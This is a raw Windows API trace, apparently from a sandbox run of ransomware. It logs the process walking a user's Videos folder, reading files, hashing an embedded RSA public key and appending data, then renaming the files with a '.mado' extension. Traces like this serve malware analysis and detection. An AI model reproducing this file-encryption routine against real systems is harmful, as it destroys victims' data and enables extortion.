HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ee98 | out: hHeap=0x2c0000) returned 1 [0206.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0206.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72c98 | out: hHeap=0x2c0000) returned 1 [0206.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0206.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0206.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0206.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0206.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0206.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0206.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0206.109] WriteFile (in: hFile=0x63c, lpBuffer=0x3b81690*, nNumberOfBytesToWrite=0x7555, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81690*, lpNumberOfBytesWritten=0x39cfb14*=0x7555, lpOverlapped=0x0) returned 1 [0206.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81690 | out: hHeap=0x2c0000) returned 1 [0206.109] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x755a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.109] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0206.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0206.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0206.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b7b950 [0206.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b7b950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0206.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b7bd80 [0206.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0206.110] WriteFile (in: hFile=0x63c, lpBuffer=0x3b7bd80*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b7bd80*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0206.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7bd80 | out: hHeap=0x2c0000) returned 1 [0206.110] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0206.110] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0206.110] CloseHandle (hObject=0x63c) returned 1 [0206.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x3b7b950 [0206.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.111] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\kMOXX\\2YNwDAh.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-na1ommnutftw3kdwzd\\kmoxx\\2ynwdah.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\kMOXX\\2YNwDAh.avi.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-na1ommnutftw3kdwzd\\kmoxx\\2ynwdah.avi.mado")) returned 1 [0206.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.114] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6360 | out: hHeap=0x2c0000) returned 1 [0206.115] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8d1900, ftCreationTime.dwHighDateTime=0x1d5d89a, ftLastAccessTime.dwLowDateTime=0xd138da40, ftLastAccessTime.dwHighDateTime=0x1d5dd94, ftLastWriteTime.dwLowDateTime=0xd138da40, ftLastWriteTime.dwHighDateTime=0x1d5dd94, nFileSizeHigh=0x0, nFileSizeLow=0xa036, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8m9Bz3FPoME9 jG_.mp4", cAlternateFileName="8M9BZ3~1.MP4")) returned 1 [0206.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321848 [0206.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x32d6360 [0206.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321848 | out: hHeap=0x2c0000) returned 1 [0206.115] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\kMOXX\\8m9Bz3FPoME9 jG_.mp4") returned=".mp4" [0206.115] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\kMOXX\\8m9Bz3FPoME9 jG_.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-na1ommnutftw3kdwzd\\kmoxx\\8m9bz3fpome9 jg_.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0206.115] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=41014) returned 1 [0206.115] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0206.118] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xa010, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.118] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0206.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.119] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0206.119] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xa036, lpOverlapped=0x0) returned 1 [0206.120] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0206.120] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.120] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.120] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321848) returned 1 [0206.121] CryptCreateHash (in: hProv=0x321848, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0206.121] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0206.121] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0206.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0206.121] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0206.121] GetLastError () returned 0x0 [0206.121] CryptDestroyHash (hHash=0x32ef238) returned 1 [0206.121] CryptReleaseContext (hProv=0x321848, dwFlags=0x0) returned 1 [0206.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0206.121] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0206.121] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0206.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.121] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0206.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa040) returned 0x3b81690 [0206.122] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0206.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0206.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0206.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0206.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0206.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66e40 [0206.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a28 [0206.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66e88 [0206.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a40 [0206.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a70 [0206.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ab8 [0206.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a88 [0206.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0206.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b75968 [0206.122] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0206.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0206.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a70 | out: hHeap=0x2c0000) returned 1 [0206.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a88 | out: hHeap=0x2c0000) returned 1 [0206.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ab8 | out: hHeap=0x2c0000) returned 1 [0206.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0206.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ab8 [0206.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0206.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x3b79a88 [0206.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0206.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x3b79a70 [0206.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0206.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b72c98 [0206.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0206.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0206.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0206.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b72db0 [0206.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0206.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0206.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72c98 | out: hHeap=0x2c0000) returned 1 [0206.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a88 | out: hHeap=0x2c0000) returned 1 [0206.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0206.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a70 | out: hHeap=0x2c0000) returned 1 [0206.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0206.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0206.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ab8 | out: hHeap=0x2c0000) returned 1 [0206.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0206.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0206.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0206.123] GetCurrentThreadId () returned 0x600 [0206.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6eb80 [0206.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x32ff508 [0206.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0206.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321848 [0206.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0206.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0206.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0206.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0206.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.124] GetCurrentThreadId () returned 0x600 [0206.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0206.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0206.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ec88 [0206.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0206.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0206.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0206.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6efa0 [0206.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ab8 [0206.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0206.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0206.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0206.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0206.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0206.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0206.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a70 [0206.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0206.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0206.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0206.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0206.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0206.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a88 [0206.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0206.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0206.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0206.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a58 [0206.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0206.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ad0 [0206.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0206.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0206.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79aa0 [0206.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ae8 [0206.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0206.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0206.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0206.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0206.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0206.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0206.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a70 | out: hHeap=0x2c0000) returned 1 [0206.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a70 [0206.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0206.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0206.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ab8 | out: hHeap=0x2c0000) returned 1 [0206.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b72c98 [0206.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ae8 | out: hHeap=0x2c0000) returned 1 [0206.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0206.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0206.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b72ec8 [0206.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0206.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b72b80 [0206.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a70 | out: hHeap=0x2c0000) returned 1 [0206.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b7b950 [0206.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72c98 | out: hHeap=0x2c0000) returned 1 [0206.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ed90 [0206.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0206.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321848 | out: hHeap=0x2c0000) returned 1 [0206.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec88 | out: hHeap=0x2c0000) returned 1 [0206.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ed90 | out: hHeap=0x2c0000) returned 1 [0206.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0206.127] HeapFree 